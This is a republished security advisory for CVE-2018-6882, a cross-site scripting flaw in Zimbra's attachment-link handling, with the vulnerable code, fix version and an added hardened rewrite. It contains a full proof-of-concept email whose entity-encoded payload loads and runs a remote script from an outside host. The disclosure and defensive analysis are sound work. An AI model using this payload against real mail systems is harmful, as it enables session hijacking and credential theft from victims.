Zimbra Collaboration Suite 8.7.11_GA_1854 Cross Site Scripting

2018.03.27
Credit: Securify B.V.
Risk: Low
Local: No
Remote: Yes
CWE: CWE-79


CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: Not required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

------------------------------------------------------------------------
Cross-Site Scripting vulnerability in Zimbra Collaboration Suite due to the way it handles attachment links
------------------------------------------------------------------------
Stephan Kaag, January 2018
------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A Cross-Site Scripting (XSS) vulnerability was found in Zimbra Collaboration Suite (ZCS). The issue lets an attacker run script in the victim's ZCS session, for example to perform arbitrary actions on the victim's behalf or to present a fake login screen that collects usernames and passwords. To exploit this issue, the attacker has to lure a victim into opening a specially crafted email in ZCS.
------------------------------------------------------------------------
See also
------------------------------------------------------------------------
- CVE-2018-6882
- https://wiki.zimbra.com/wiki/Zimbra_Releases/8.8.7
- https://bugzilla.zimbra.com/show_bug.cgi?id=108786
- https://wiki.zimbra.com/wiki/Zimbra_Security_Advisories
------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on ZCS 8.7.11_GA_1854 (build 20170531151956). It is however likely that this issue is present in all versions of ZCS from version 8.5.0 on.
------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
The issue is fixed in Zimbra Collaboration Suite version 8.8.7.
------------------------------------------------------------------------
Details
------------------------------------------------------------------------
https://www.securify.nl/advisory/SFY20180101/cross-site-scripting-vulnerability-in-zimbra-collaboration-suite-due-to-the-way-it-handles-attachment-links.html

If an email that contains one or more attachments is opened, a link ('<a>' tag) is created for each attachment. The code responsible for this is the ZmMailMsgView.getAttachmentLinkHtml function:

    ZmMailMsgView.getAttachmentLinkHtml = function(params) {
        var html = [], i = 0;
        html[i++] = "<a class='AttLink' ";
        [..]
        var href = params.href || (params.jsHref && "javascript:;");
        html[i++] = href ? "href='" + href + "' " : "";
        [..]
        html[i++] = "'>" + AjxStringUtil.htmlEncode(params.text) + "</a>";
        return html.join("");
    };

In the above code the value of params.href is taken directly from the Content-Location header of the attachment's MIME part. No sanitization or attribute encoding is performed on it (only params.text, the link caption, goes through AjxStringUtil.htmlEncode), and the header value is controlled by the sender of the message. A single quote in the value therefore terminates the href attribute, after which the remainder of the value is emitted as raw markup, so arbitrary HTML or JavaScript can be injected through the '<a>' tag.

To exploit this issue an attacker sends an email with a specially crafted Content-Location header to a victim user. When the victim opens the message, the injected script executes in the victim's ZCS session.

Proof of concept

The following proof of concept email demonstrates the issue. When the mail is opened, a JavaScript file from an external location is loaded in Zimbra. The Content-Location value closes the href attribute and the '<a>' element, injects an '<img>' whose onerror handler is written as HTML numeric character references (which the browser decodes inside the attribute value), and then opens a new '<a href=' to swallow the rest of the generated markup. Decoded, the onerror handler reads:

    window.x=document.createElement('script');window.x.src='https://s3-eu-west-1.amazonaws.com/eviljs/evil.js';document.body.appendChild(window.x)
---[snip]---
From: me@example.com
To: victim@example.com
Subject: Re: My message
MIME-Version: 1.0
Date: Thu, 4 Jan 2018 14:25:25 +0100 (CET)
Content-Type: multipart/mixed; boundary="----=_Part_112602234_144352703.1515072325170"

------=_Part_112602234_144352703.1515072325170
Content-Type: text/plain; charset=utf-8
Content-Transfer-Encoding: 7bit

------=_Part_112602234_144352703.1515072325170
Content-Type: text/plain; name=attachment.txt
Content-Disposition: attachment; filename=attachment.txt
Content-Transfer-Encoding: base64
Content-Location: http://foo.bar'></a><img src=a onerror=&#119;&#105;&#110;&#100;&#111;&#119;&#46;&#120;&#61;&#100;&#111;&#99;&#117;&#109;&#101;&#110;&#116;&#46;&#99;&#114;&#101;&#97;&#116;&#101;&#69;&#108;&#101;&#109;&#101;&#110;&#116;&#40;&#39;&#115;&#99;&#114;&#105;&#112;&#116;&#39;&#41;&#59;&#119;&#105;&#110;&#100;&#111;&#119;&#46;&#120;&#46;&#115;&#114;&#99;&#61;&#39;&#104;&#116;&#116;&#112;&#115;&#58;&#47;&#47;&#115;&#51;&#45;&#101;&#117;&#45;&#119;&#101;&#115;&#116;&#45;&#49;&#46;&#97;&#109;&#97;&#122;&#111;&#110;&#97;&#119;&#115;&#46;&#99;&#111;&#109;&#47;&#101;&#118;&#105;&#108;&#106;&#115;&#47;&#101;&#118;&#105;&#108;&#46;&#106;&#115;&#39;&#59;&#100;&#111;&#99;&#117;&#109;&#101;&#110;&#116;&#46;&#98;&#111;&#100;&#121;&#46;&#97;&#112;&#112;&#101;&#110;&#100;&#67;&#104;&#105;&#108;&#100;&#40;&#119;&#105;&#110;&#100;&#111;&#119;&#46;&#120;&#41;><a href='

YXR0YWNobWVudAo=
------=_Part_112602234_144352703.1515072325170--
---[snip]---
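The following is an added example, not Zimbra's code and not part of the Securify advisory. It reduces the attachment-link pattern described in the Details section to a few lines, places a hardened version beside it, and runs both against a Content-Location value constructed in the shape of the proof of concept (same quote-and-close technique, but with an entity-encoded alert(1) instead of the remote script). AjxStringUtil.htmlEncode is replaced by a local htmlEncode() with the same role, and the elided parts of the original function are omitted; the names vulnerableAttachmentLinkHtml, hardenedAttachmentLinkHtml and POC_LOCATION are this example's own.

```javascript
// Added example (not Zimbra's code): reduced reconstruction of the vulnerable
// attachment-link builder, a hardened form, and a constructed Content-Location
// value in the shape of the advisory's proof of concept.

// Encode text for an HTML text node (the role AjxStringUtil.htmlEncode plays
// for the link caption in the original).
function htmlEncode(s) {
  return String(s).replace(/&/g, "&amp;").replace(/</g, "&lt;").replace(/>/g, "&gt;");
}

// Encode a value for a quoted HTML attribute: additionally neutralise both
// quote characters so the value can never terminate the attribute.
function attrEncode(s) {
  return htmlEncode(s).replace(/"/g, "&quot;").replace(/'/g, "&#39;");
}

// Vulnerable pattern: params.href (the Content-Location header value) is
// concatenated straight into the href attribute.
function vulnerableAttachmentLinkHtml(params) {
  var html = [], i = 0;
  html[i++] = "<a class='AttLink' ";
  var href = params.href || (params.jsHref && "javascript:;");
  html[i++] = href ? "href='" + href + "' " : "";
  html[i++] = ">" + htmlEncode(params.text) + "</a>";
  return html.join("");
}

// Hardened form: an attacker-controlled href is accepted only with an http(s)
// scheme (blocks javascript: and data: URLs) and is attribute-encoded, so a
// quote or angle bracket inside it stays inside the attribute value.
function hardenedAttachmentLinkHtml(params) {
  var html = [], i = 0;
  html[i++] = "<a class='AttLink' ";
  var href = null;
  if (typeof params.href === "string" && /^https?:\/\//i.test(params.href.trim())) {
    href = params.href.trim();
  } else if (params.jsHref) {
    href = "javascript:;"; // fixed constant from the original pattern, not sender input
  }
  html[i++] = href ? "href='" + attrEncode(href) + "' " : "";
  html[i++] = ">" + htmlEncode(params.text) + "</a>";
  return html.join("");
}

// Browsers decode numeric character references inside attribute values, which
// is why the proof of concept can write its onerror handler as &#..; sequences.
// This helper shows what such a handler decodes to.
function decodeNumericEntities(s) {
  return s.replace(/&#(\d+);/g, function (_, n) { return String.fromCharCode(Number(n)); });
}

// Constructed header value (not the advisory's): close the href quote and the
// <a>, inject an <img> whose onerror is entity-encoded alert(1), then reopen
// an <a href=' to swallow the rest of the generated markup.
var POC_LOCATION =
  "http://foo.bar'></a><img src=a onerror=&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;><a href='";

function demo() {
  var params = { href: POC_LOCATION, text: "attachment.txt" };
  return {
    vulnerable: vulnerableAttachmentLinkHtml(params),
    hardened: hardenedAttachmentLinkHtml(params),
    handler: decodeNumericEntities("&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;"),
    blockedScheme: hardenedAttachmentLinkHtml({ href: "javascript:alert(1)", text: "x" })
  };
}

var r = demo();
console.log(r.vulnerable);    // contains a live <img src=a onerror=...> tag
console.log(r.hardened);      // the whole value stays inside href='...' as &#39; &lt; &gt;
console.log(r.handler);       // alert(1)
console.log(r.blockedScheme); // <a class='AttLink' >x</a>
```

The encoding step alone is the fix the bug class calls for: once the attribute value cannot contain a raw quote, the payload is just an odd-looking URL. The scheme check is defence in depth for the same attribute, since a link whose href is sender-controlled should never become a javascript: or data: URL.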


Copyright 2018, cxsecurity.com